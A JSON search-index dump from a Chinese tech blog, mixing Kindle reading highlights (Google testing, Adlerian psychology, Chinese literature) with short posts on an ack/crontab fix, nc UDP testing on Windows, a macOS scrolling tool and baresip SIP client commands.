位置 2202确定风险的过程称为风险分析。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 22021.风险分析标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2204这些事件发生的可能性有多大?一旦发生,对公司产生多大影响?一旦发生,对客户产生多大影响?产品具备什么缓解措施?标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2206这些缓解措施有多大可能会失败?处理这些失败的成本有哪些?恢复过程有多困难?事件是一次性问题,还是会再次发生?影响标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2209在 Google,我们确定了两个要素:失败频率( frequency of failure)和影响( impact)。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2214风险发生频率有 4个预定义值。罕见(标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2217少见( seldom):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2221偶尔( occasionally):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2225常见( often):标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2229测试人员确定每个能力的故障发生频率。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2230估计风险影响的方法大致相同,也是从几种偶数取值中选标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2231最小( minimal):用户甚至不会注意到的问题。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2234一些( some):可能会打扰到用户的问题。一旦发生,重试或恢复标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2237较大( considerable):故障导致标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2240最大( maximal):发生的故障会永久性的损害产品的声誉,并导致用户不再使用它。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2267风险不大可能彻底消除。驾驶有风险,但我们仍然会开车出行;旅游有风险,但我们并没有停止旅游。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2285在软件开发中,任何一种可以在 10分钟之内完成的事情都是微不足道的,或是本来就不值得做的。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2323风险分析是一个独立的领域,在许多其他行业里被严肃地对待。我们现在采用的是一个轻量级的版本,标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2325风险管理方法),这可以作为进一步学习这一重要课题的起点。标注(黄色) - 3.2.2 风险 \u0026gt; 位置 2328TE有责任理解所有的风险点,并使用他或她可以利用的任何手段予以缓解。标注(黄色) - 3.2.5 TE的招聘 \u0026gt; 位置 2668他们只是在试图破坏软件,还是同时在验证它能正常工作?标注(黄色) - 3.2.5 TE的招聘 \u0026gt; 位置 2717我们需要的是愿意持续学习和成长的人。我们也需要那些带来新鲜思想和经验的人,标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3301对于一个新项目,我首先要站在用户的角度了解这个产品。有可能的话,我会作为一个用户,以自己的账户和个人数据去使用产品。我努力使自己经历完整的用户体验。一旦有自己的真实数据在里面,你对一个产品的期待会彻底改变。在具备了用户心态之后,我会做下面的一些事情。标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3362遗漏到客户的 bug是一项重要指标,我希望这个数字接近 0。标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3377或者用户场景无需编写、自动到位。 CRUD操作(译注: create、 read、 update、 delete)标注(黄色) - 3.3 与Google Docs测试工程师林赛·韦伯斯特(Lindsay Webster)的访谈 \u0026gt; 位置 3385团队在推出一个产品或新功能时难免感到提心吊胆,而我能带给他们镇定和信心,这使我感到自己是一种正面、有益的力量。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3416而 Google的 SET必须写代码,这是他们的工作。这里也很难找到不会写代码的 TE。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3426Google的测试与其他公司的相同之处呢? Apple:在测试上难以自动化的软件,很难成为好的软件。标注(黄色) - 3.4 与YouTube测试工程师安普·周(Apple Chow)的访谈 \u0026gt; 位置 3493不管是测试框架还是测试用例都以简单为要,随着项目的开展再迭代的设计。不要试图事先解决所有问题。要敢于扔掉过时的东西。第4章 测试工程经理标注(黄色) - 4.8 搜索和地理信息测试总监Shelton Mar的访谈 \u0026gt; 位置 3989把测试推向上游,让整个团队(开发 +测试)为交付的质量负责。标注(黄色) - 4.8 搜索和地理信息测试总监Shelton Mar的访谈 \u0026gt; 位置 4025从那以后,我们把配置变更也纳入质量流程中,我们开发了一套自动化测试,每次数据和配置变更时都要执行。标注(黄色) - 4.11 工程经理Brad Green访谈 \u0026gt; 位置 4219Google聘用的都是有极端自我驱动力的家伙。“标注(黄色) - 4.12 James Whittaker访谈 \u0026gt; 位置 4339先虚心学习,再在一线作出成绩,然后开始寻求创新的方法。第5章 Google软件测试改进标注(黄色) - 位置 4398Google的测试流程可以非常简练地概括为:标注(黄色) - 位置 4398让每个工程师都注重质量。标注(黄色) - 位置 4398只要大家诚实认真地这么做,质量就会提高。代码质量从一开始就能更好,标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4408可是测试并不能保证质量。质量是内建的,而不是外加的。因此,保证质量是开发者的任务,标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4409测试成了开发的拐杖。我们越不让开发考虑测试的问题,把测试变得越简单,开发就越来越不会去做测试。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4415保证质量不但是别人的问题,它甚至还属于另一个部门。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4416出问题的时候也很容易就把责任推卸给修前草坪的外包公司。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4426第三个致命的缺陷,是测试人员往往崇拜测试产物( test artifact)胜过软件本身。标注(黄色) - 5.1 Google流程中的致命缺陷 \u0026gt; 位置 4430所有测试产物的价值,在于它们对代码的影响,进而通过产品来体现。标注(黄色) - 5.2 SET的未来 \u0026gt; 位置 4447简单来说,我们认为 SET没有未来。 SET就是开发。就这么简单。标注(黄色) - 5.2 SET的未来 \u0026gt; 位置 4450SET直接负责很多功能特性,如可测试性、可靠性、可调试性,\n","permalink":"https://wdd.js.org/posts/2021/07/yh8ulq/","summary":"Google软件测试之道(异步图书)James Whittaker; Jason Arbon; Jeff Carollo\n序标注(黄色) - 位置 361从根本上说,如果测试人员想加入这个俱乐部,就必须具备良好的计算机科学基础和编程能力。变革标注(黄色) - 位置 367招聘具备开发能力的测试人员很难,找到懂测试的开发人员就更难,标注(黄色) - 位置 368但是维持现状更要命,我只能往前走。标注(黄色) - 位置 388我们寻找的人要兼具开发人员的技能和测试人员的思维,他们必须会编程,能实现工具、平台和测试自动化。第1章 Google软件测试介绍标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 573Google能用如此少的专职测试人员的原因,就是开发对质量的负责。标注(黄色) - 1.1 质量不等于测试 \u0026gt; 位置 574如果某个产品出了问题,第一个跳出来的肯定是导致这个问题发生的开发人员,而不是遗漏这个 bug的测试人员。标注(黄色) - 1.2.1 软件开发工程师(SWE) \u0026gt; 位置 593软件开发工程师(标注(黄色) - 1.2.2 软件测试开发工程师(SET) \u0026gt; 位置 600软件测试开发工程师(标注(黄色) - 1.2.3 测试工程师(TE) \u0026gt; 位置 612TE把用户放在第一位来思考。 TE组织整体质量实践,分析解释测试运行结果,第2章 软件测试开发工程师书签 - 位置 784标注(黄色) - 位置 787Google的 SWE是功能开发人员; Google的 SET是测试开发人员; Google的 TE是用户开发人员。标注(黄色) - 2.1.1 开发和测试流程 \u0026gt; 位置 864测试驱动开发”标注(黄色) - 2.","title":"Google软件测试之道(异步图书) James Whittaker; Jason Arbon; Jeff Carollo"},{"content":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)亚历克斯·麦克利兹\n第二部分 PAPT TWO标注(黄色) - 9 \u0026gt; 位置 1294选择自己所爱的人就像选择心理治疗师,”鲁思说,“我们有必要问自己,这个人会不会对我忠诚,能不能听得进批评,标注(黄色) - 9 \u0026gt; 位置 1295承认所犯的错误,而且做不到的事情决不承诺?”第三部分 PAPT THREE标注(黄色) - 位置 2577虽然我生来不是个好人,有时我却偶然要做个好人。——威廉·莎士比亚《冬天的故事》[\n","permalink":"https://wdd.js.org/posts/2021/07/rgx3g5/","summary":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)亚历克斯·麦克利兹\n第二部分 PAPT TWO标注(黄色) - 9 \u0026gt; 位置 1294选择自己所爱的人就像选择心理治疗师,”鲁思说,“我们有必要问自己,这个人会不会对我忠诚,能不能听得进批评,标注(黄色) - 9 \u0026gt; 位置 1295承认所犯的错误,而且做不到的事情决不承诺?”第三部分 PAPT THREE标注(黄色) - 位置 2577虽然我生来不是个好人,有时我却偶然要做个好人。——威廉·莎士比亚《冬天的故事》[","title":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)"},{"content":"手工执行,可以获得预期结果,但是在crontab中,却查不到结果。\nstage_count=$(ack -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 最终使用--nofilter参数,解决了问题。\nstage_count=$(ack --nofilter -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 参考\nhttps://stackoverflow.com/questions/55777520/ack-fails-in-cronjob-but-runs-fine-from-commandline ","permalink":"https://wdd.js.org/shell/contab-ack/","summary":"手工执行,可以获得预期结果,但是在crontab中,却查不到结果。\nstage_count=$(ack -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 最终使用--nofilter参数,解决了问题。\nstage_count=$(ack --nofilter -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 参考\nhttps://stackoverflow.com/questions/55777520/ack-fails-in-cronjob-but-runs-fine-from-commandline ","title":"Ack 在contab中无法查到关键词"},{"content":"引言标注(黄色) - 位置 225人并不是住在客观的世界,而是住在自己营造的主观世界里。第一夜 我们的不幸是谁的错?标注(黄色) - 不为人知的心理学“第三巨头” \u0026gt; 位置 335但在世界上,阿德勒是与弗洛伊德、荣格并列的三大巨头之一。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 377如果所有人的“现在”都由“过去”所决定,那岂不是很奇怪吗?标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 384您是说与过去没有关系?哲人:是的,这就是阿德勒心理学的立场。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 389阿德勒心理学考虑的不是过去的“原因”,而是现在的“目的”。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 417任何经历本身并不是成功或者失败的原因。我们并非因为自身经历中的刺激——所谓的心理创伤——而痛苦,事实上我们会从经历中发现符合自己目的的因素。决定我们自身的不是过去的经历,而是我们自己赋予经历的意义。”标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 423人生不是由别人赋予的,而是由自己选择的,是自己选择自己如何生活。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 443我们大家都是在为了某种“目的”而活着。这就是目的论。标注(黄色) - 你的不幸,皆是自己“选择”的 \u0026gt; 位置 599而是因为你认为“不幸”对你自身而言是一种“善”。标注(黄色) - 人们常常下定决心“不改变” \u0026gt; 位置 614某人如何看“世界”,又如何看“自己”,把这些“赋予意义的方式”汇集起来的概念就可以理解为生活方式。标注(黄色) - 你的人生取决于“当下” \u0026gt; 位置 706无论之前的人生发生过什么,都对今后的人生如何度过没有影响。”决定自己人生的是活在“此时此刻”的你自己。第二夜 一切烦恼都来自人际关系标注(黄色) - 为什么讨厌自己? \u0026gt; 位置 780阿德勒心理学把这叫作“鼓励”。青年:鼓励?书签 - 一切烦恼都是人际关系的烦恼 \u0026gt; 位置 834标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 936自卑情结是指把自己的自卑感当作某种借口使用的状态。标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 943外部因果律”一词来进行说明。意思就是:将原本没有任何因果关系的事情解释成似乎有重大因果关系一样。标注(黄色) - 人生不是与他人的比赛 \u0026gt; 位置 1044健全的自卑感不是来自与别人的比较,而是来自与“理想的自己”的比较。标注(黄色) - 在意你长相的,只有你自己 \u0026gt; 位置 1071在意你长相的,只有你自己标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1223交友课题、工作课题以及爱的课题标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1224一切烦恼皆源于人际关系”标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1313当人能够感觉到“与这个人在一起可以无拘无束”的时候,才能够体会到爱。既没有自卑感也不必炫耀优越性,能够保持一种平静而自然的状态。真正的爱应该是这样的。标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1315束缚是想要支配对方的表现,也是一种基于不信任感的想法。与一个不信任自己的人处在同一个空间里,那就根本不可能保持一种自然状态。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1333那并不是因为无法容忍 A的缺点才讨厌他,而是你先有“要讨厌 A”这个目的,之后才找出了符合这个目的的缺点。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1345人就是这么任性而自私的生物,一旦产生这种想法,无论怎样都能发现对方的缺点。标注(黄色) - 阿德勒心理学是“勇气的心理学” \u0026gt; 位置 1373青年:也就是“不在于被给予了什么,而在于如何去使用被给予的东西”那句话吗?第三夜 让干涉你生活的人见鬼去标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1405就是:“货币是被铸造的自由。”它是陀思妥耶夫斯基的小说中出现的一句话。“被铸造的自由”这种说法是何等的痛快啊!我认为这是一句非常精辟的话,它一语道破了货币的标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1449阿德勒心理学否定寻求他人的认可。标注(黄色) - 要不要活在别人的期待中? \u0026gt; 位置 1479在犹太教教义中有这么一句话:“倘若自己都不为自己活出自己的人生,那还有谁会为自己而活呢?”你就活在自己的人生中。书签 - 要不要活在别人的期待中? \u0026gt; 位置 1498标注(黄色) - 砍断“格尔迪奥斯绳结” \u0026gt; 位置 1689否定原因论、否定精神创伤、采取目的论;认为人的烦恼全都是关于人际关系的烦恼;此外,不寻求认可或者课题分离也全都是反常识的理论。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1764自由就是被别人讨厌”。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1785不畏惧被人讨厌而是勇往直前,不随波逐流而是激流勇进,这才是对人而言的自由。第五夜 认真的人生“活在当下”标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2910人生中最大的谎言就是不活在“此时此刻”。纠结过去、关注未来,把微弱而模糊的光打向人生整体,自认为看到了些什么。标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2916因为过去和未来根本不存在,所以才要谈现在。起决定作用的既不是昨天也不是明天,而是“此时此刻”。标注(黄色) - 人生的意义,由你自己决定 \u0026gt; 位置 2982必须有人开始。即使别人不合作,那也与你无关。我的意见就是这样。应该由你开始,不用去考虑别人是否合作。”后记标注(黄色) - 位置 3011一切烦恼皆源于人际关系”“人可以随时改变并能够获得幸福”“问题不在于能力而在于勇气\n","permalink":"https://wdd.js.org/posts/2021/06/ineayu/","summary":"引言标注(黄色) - 位置 225人并不是住在客观的世界,而是住在自己营造的主观世界里。第一夜 我们的不幸是谁的错?标注(黄色) - 不为人知的心理学“第三巨头” \u0026gt; 位置 335但在世界上,阿德勒是与弗洛伊德、荣格并列的三大巨头之一。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 377如果所有人的“现在”都由“过去”所决定,那岂不是很奇怪吗?标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 384您是说与过去没有关系?哲人:是的,这就是阿德勒心理学的立场。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 389阿德勒心理学考虑的不是过去的“原因”,而是现在的“目的”。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 417任何经历本身并不是成功或者失败的原因。我们并非因为自身经历中的刺激——所谓的心理创伤——而痛苦,事实上我们会从经历中发现符合自己目的的因素。决定我们自身的不是过去的经历,而是我们自己赋予经历的意义。”标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 423人生不是由别人赋予的,而是由自己选择的,是自己选择自己如何生活。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 443我们大家都是在为了某种“目的”而活着。这就是目的论。标注(黄色) - 你的不幸,皆是自己“选择”的 \u0026gt; 位置 599而是因为你认为“不幸”对你自身而言是一种“善”。标注(黄色) - 人们常常下定决心“不改变” \u0026gt; 位置 614某人如何看“世界”,又如何看“自己”,把这些“赋予意义的方式”汇集起来的概念就可以理解为生活方式。标注(黄色) - 你的人生取决于“当下” \u0026gt; 位置 706无论之前的人生发生过什么,都对今后的人生如何度过没有影响。”决定自己人生的是活在“此时此刻”的你自己。第二夜 一切烦恼都来自人际关系标注(黄色) - 为什么讨厌自己? \u0026gt; 位置 780阿德勒心理学把这叫作“鼓励”。青年:鼓励?书签 - 一切烦恼都是人际关系的烦恼 \u0026gt; 位置 834标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 936自卑情结是指把自己的自卑感当作某种借口使用的状态。标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 943外部因果律”一词来进行说明。意思就是:将原本没有任何因果关系的事情解释成似乎有重大因果关系一样。标注(黄色) - 人生不是与他人的比赛 \u0026gt; 位置 1044健全的自卑感不是来自与别人的比较,而是来自与“理想的自己”的比较。标注(黄色) - 在意你长相的,只有你自己 \u0026gt; 位置 1071在意你长相的,只有你自己标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1223交友课题、工作课题以及爱的课题标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1224一切烦恼皆源于人际关系”标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1313当人能够感觉到“与这个人在一起可以无拘无束”的时候,才能够体会到爱。既没有自卑感也不必炫耀优越性,能够保持一种平静而自然的状态。真正的爱应该是这样的。标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1315束缚是想要支配对方的表现,也是一种基于不信任感的想法。与一个不信任自己的人处在同一个空间里,那就根本不可能保持一种自然状态。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1333那并不是因为无法容忍 A的缺点才讨厌他,而是你先有“要讨厌 A”这个目的,之后才找出了符合这个目的的缺点。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1345人就是这么任性而自私的生物,一旦产生这种想法,无论怎样都能发现对方的缺点。标注(黄色) - 阿德勒心理学是“勇气的心理学” \u0026gt; 位置 1373青年:也就是“不在于被给予了什么,而在于如何去使用被给予的东西”那句话吗?第三夜 让干涉你生活的人见鬼去标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1405就是:“货币是被铸造的自由。”它是陀思妥耶夫斯基的小说中出现的一句话。“被铸造的自由”这种说法是何等的痛快啊!我认为这是一句非常精辟的话,它一语道破了货币的标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1449阿德勒心理学否定寻求他人的认可。标注(黄色) - 要不要活在别人的期待中? \u0026gt; 位置 1479在犹太教教义中有这么一句话:“倘若自己都不为自己活出自己的人生,那还有谁会为自己而活呢?”你就活在自己的人生中。书签 - 要不要活在别人的期待中? \u0026gt; 位置 1498标注(黄色) - 砍断“格尔迪奥斯绳结” \u0026gt; 位置 1689否定原因论、否定精神创伤、采取目的论;认为人的烦恼全都是关于人际关系的烦恼;此外,不寻求认可或者课题分离也全都是反常识的理论。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1764自由就是被别人讨厌”。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1785不畏惧被人讨厌而是勇往直前,不随波逐流而是激流勇进,这才是对人而言的自由。第五夜 认真的人生“活在当下”标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2910人生中最大的谎言就是不活在“此时此刻”。纠结过去、关注未来,把微弱而模糊的光打向人生整体,自认为看到了些什么。标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2916因为过去和未来根本不存在,所以才要谈现在。起决定作用的既不是昨天也不是明天,而是“此时此刻”。标注(黄色) - 人生的意义,由你自己决定 \u0026gt; 位置 2982必须有人开始。即使别人不合作,那也与你无关。我的意见就是这样。应该由你开始,不用去考虑别人是否合作。”后记标注(黄色) - 位置 3011一切烦恼皆源于人际关系”“人可以随时改变并能够获得幸福”“问题不在于能力而在于勇气","title":"被讨厌的勇气:“自我启发之父”阿德勒的哲学课"},{"content":"有时候,客户端的udp包被中间的防火墙拦截了,在linux上可以很简单的用nc启动一个udp server\n# 启动udp server 监听8888端口 nc -ulp 20000 # 启动udp client nc -u 127.0.0.1 20000 在linux上启动nc udp server很简单,但是在windows上,没办法安装nc啊?😭\n峰回路转 https://nmap.org/download.html 在查看了nc的官网之后,发现nc实际上也提供了windows的程序,有两种版本。\n有GUI界面的,使用友好,安装包比较大 https://nmap.org/dist/nmap-7.91-setup.exe 仅仅在命令行下执行,刚好满足需求 https://nmap.org/dist/nmap-7.91-win32.zip 看看带GUI界面的\n附件 nmap-7.91-win32.zip ","permalink":"https://wdd.js.org/posts/2021/06/ex5n9h/","summary":"有时候,客户端的udp包被中间的防火墙拦截了,在linux上可以很简单的用nc启动一个udp server\n# 启动udp server 监听8888端口 nc -ulp 20000 # 启动udp client nc -u 127.0.0.1 20000 在linux上启动nc udp server很简单,但是在windows上,没办法安装nc啊?😭\n峰回路转 https://nmap.org/download.html 在查看了nc的官网之后,发现nc实际上也提供了windows的程序,有两种版本。\n有GUI界面的,使用友好,安装包比较大 https://nmap.org/dist/nmap-7.91-setup.exe 仅仅在命令行下执行,刚好满足需求 https://nmap.org/dist/nmap-7.91-win32.zip 看看带GUI界面的\n附件 nmap-7.91-win32.zip ","title":"windows版本nc教程:在windows上做udp测试"},{"content":"现象 有时候轻微滚动滚轮,页面不滚动,然后突然又发生了滚动 解决方案 Mos https://github.com/Caldis/Mos 一个用于在MacOS上平滑你的鼠标滚动效果的小工具, 让你的滚轮爽如触控板。 特性 疯狂平滑你的鼠标滚动效果 支持分离触控板/鼠标事件, 单独翻转鼠标滚动方向。 滚动曲线的自定义调整。 支持区分应用处理, 黑/白名单系统。 用于监控滚动事件的图形化呈现窗口。 基于 Swift4 构建 免费 附件 Mos.Versions.3.3.2.dmg ","permalink":"https://wdd.js.org/posts/2021/06/ismran/","summary":"现象 有时候轻微滚动滚轮,页面不滚动,然后突然又发生了滚动 解决方案 Mos https://github.com/Caldis/Mos 一个用于在MacOS上平滑你的鼠标滚动效果的小工具, 让你的滚轮爽如触控板。 特性 疯狂平滑你的鼠标滚动效果 支持分离触控板/鼠标事件, 单独翻转鼠标滚动方向。 滚动曲线的自定义调整。 支持区分应用处理, 黑/白名单系统。 用于监控滚动事件的图形化呈现窗口。 基于 Swift4 构建 免费 附件 Mos.Versions.3.3.2.dmg ","title":"macos 鼠标滚轮不灵敏"},{"content":"安装 安装前要先安装依赖\nhttps://github.com/baresip/re https://github.com/baresip/rem openssl git clone https://github.com/baresip/baresip cd baresip make sudo make install 指令 /about About box/accept Accept incoming call/answermode Set answer mode/apistate User Agent state/auloop Start audio-loop /auloop_stop Stop audio-loop/auplay Switch audio player/ausrc Switch audio source/callstat Call status/conf_reload Reload config file/config Print configuration/contact_next Set next contact/contact_prev Set previous contact/contacts List contacts/dial .. Dial/dialcontact Dial current contact/hangup Hangup call/help Help menu/insmod Load module/listcalls List active calls/loglevel Log level toggle/main Main loop debug/memstat Memory status/message Message current contact/modules Module debug/netstat Network debug/options Options/play Play audio file/quit Quit/reginfo Registration info/rmmod Unload module/sipstat SIP debug/sysinfo System info/timers Timer debug/uadel Delete User-Agent/uafind Find User-Agent /uanew Create User-Agent/uanext Toggle UAs/uastat UA debug/uuid Print UUID/vidloop Start video-loop /vidloop stop Stop video-loop/vidsrc Switch video source\n模块 aac Advanced Audio Coding (AAC) audio codecaccount Account loaderalsa ALSA audio driveramr Adaptive Multi-Rate (AMR) audio codecaptx Audio Processing Technology codec (aptX)aubridge Audio bridge moduleaudiounit AudioUnit audio driver for MacOSX/iOSaufile Audio module for using a WAV-file as audio inputauloop Audio-loop test moduleausine Audio sine wave input moduleav1 AV1 video codecavcapture Video source using iOS AVFoundation video captureavcodec Video codec using FFmpeg/libav libavcodecavformat Video source using FFmpeg/libav libavformatb2bua Back-to-Back User-Agent (B2BUA) modulecodec2 Codec2 low bit rate speech codeccons UDP/TCP console UI drivercontact Contacts modulecoreaudio Apple macOS Coreaudio driverctrl_tcp TCP control interface using JSON payloaddebug_cmd Debug commandsdirectfb DirectFB video display moduledshow Windows DirectShow video sourcedtls_srtp DTLS-SRTP end-to-end encryptionebuacip EBU ACIP (Audio Contribution over IP) Profileecho Echo server moduleevdev Linux input driverfakevideo Fake video input/output driverg711 G.711 audio codecg722 G.722 audio codecg7221 G.722.1 audio codecg726 G.726 audio codecgsm GSM audio codecgst Gstreamer audio sourcegst_video Gstreamer video codecgtk GTK+ 2.0 UIgzrtp ZRTP module using GNU ZRTP C++ libraryhttpd HTTP webserver UI-modulei2s I2S (Inter-IC Sound) audio driverice ICE protocol for NAT Traversaljack JACK Audio Connection Kit audio-driverl16 L16 audio codecmenu Interactive menumpa MPA Speech and Audio Codecmulticast Multicast RTP send and receivemqtt MQTT (Message Queue Telemetry Transport) modulemwi Message Waiting Indicationnatpmp NAT Port Mapping Protocol (NAT-PMP) moduleomx OpenMAX IL video display moduleopensles OpenSLES audio driveropus OPUS Interactive audio codecpcp Port Control Protocol (PCP) moduleplc Packet Loss Concealment (PLC) using spandspportaudio Portaudio driverpulse Pulseaudio driverpresence Presence modulertcpsummary RTCP summary modulerst Radio streamer using mpg123sdl Simple DirectMedia Layer 2.0 (SDL) video output driverselfview Video selfview modulesnapshot Save video-stream as PNG imagessndfile Audio dumper using libsndfilesndio Audio driver for OpenBSDspeex_pp Audio pre-processor using libspeexdspsrtp Secure RTP encryption (SDES) using libre SRTP-stackstdio Standard input/output UI driverstun Session Traversal Utilities for NAT (STUN) moduleswscale Video scaling using libswscalesyslog Syslog moduleturn Obtaining Relay Addresses from STUN (TURN) moduleuuid UUID generator and loaderv4l2 Video4Linux2 video sourcev4l2_codec Video4Linux2 video codec module (H264 hardware encoding)vidbridge Video bridge modulevidinfo Video info overlay modulevidloop Video-loop test modulevp8 VP8 video codecvp9 VP9 video codecvumeter Display audio levels in consolewebrtc_aec Acoustic Echo Cancellation (AEC) using WebRTC SDKwincons Console input driver for Windowswinwave Audio driver for Windowsx11 X11 video output driverx11grab X11 grabber video sourcezrtp ZRTP media encryption module\n参考 https://github.com/baresip/baresip ","permalink":"https://wdd.js.org/opensips/tools/baresip/","summary":"安装 安装前要先安装依赖\nhttps://github.com/baresip/re https://github.com/baresip/rem openssl git clone https://github.com/baresip/baresip cd baresip make sudo make install 指令 /about About box/accept Accept incoming call/answermode Set answer mode/apistate User Agent state/auloop Start audio-loop /auloop_stop Stop audio-loop/auplay Switch audio player/ausrc Switch audio source/callstat Call status/conf_reload Reload config file/config Print configuration/contact_next Set next contact/contact_prev Set previous contact/contacts List contacts/dial .. Dial/dialcontact Dial current contact/hangup Hangup call/help Help menu/insmod Load module/listcalls List active calls/loglevel Log level toggle/main Main loop debug/memstat Memory status/message Message current contact/modules Module debug/netstat Network debug/options Options/play Play audio file/quit Quit/reginfo Registration info/rmmod Unload module/sipstat SIP debug/sysinfo System info/timers Timer debug/uadel Delete User-Agent/uafind Find User-Agent /uanew Create User-Agent/uanext Toggle UAs/uastat UA debug/uuid Print UUID/vidloop Start video-loop /vidloop stop Stop video-loop/vidsrc Switch video source","title":"baresip 非常好用的终端SIP UA"},{"content":"第一讲 关关雎鸠在河洲 ——先秦神话和诗歌标注(黄色) - 位置 129女娲炼石补天处,石破天惊逗秋雨”,第二讲 百家争鸣写春秋 ——先秦散文标注(黄色) - 位置 306为川者决之使导,为民者宣之使言。”标注(黄色) - 位置 466他就发愤努力,一定要做仓库里的老鼠。第三讲 大风起兮云飞扬 ——汉朝的赋和散文标注(黄色) - 位置 538有两个情况可以免死:一是拿出大量的金钱赎身;第二就是受宫刑。标注(黄色) - 位置 539叫《报任安书》:标注(黄色) - 位置 557事情。《史记》写完之后,司马迁就不知所终了。第六讲 独念天地之悠悠 ——隋与初唐文学标注(黄色) - 位置 1346王勃,他在初唐时代是一个非常有才华的少年,他 27岁就死了。真是“千古文章未尽才”。他写《滕王阁序》,标注(黄色) - 位置 1359就是把你的遭遇拉到跟他相同的地步。譬如说,你考试得了 65分,不高兴,我就对你说:不要难过嘛,我不过只考 67分而已,咱们俩都差不多。第七讲 登高壮观天地间 ——盛唐诗歌标注(黄色) - 位置 1406秦时明月汉时关,万里长征人未还。但使龙城飞将在,不教胡马度阴山。——王昌龄《出塞二首》(其一)标注(黄色) - 位置 1664桃花潭水深千尺,不及汪伦送我情。第八讲 乌衣巷口夕阳斜 ——中唐诗歌标注(黄色) - 位置 1809座中泣下谁最多,江州司马青衫湿。”标注(黄色) - 位置 1892十年磨一剑,霜刃未曾试。第九讲 霜叶红于二月花 ——晚唐诗歌标注(黄色) - 位置 1906停车坐爱枫林晚,霜叶红于二月花。第十讲 大江东去浪淘沙 ——两宋金元文学书签 - 位置 2168标注(黄色) - 位置 2509山盟虽在,锦书难托。标注(黄色) - 位置 2559劝君更尽一杯酒,西出阳关无故人”,标注(黄色) - 位置 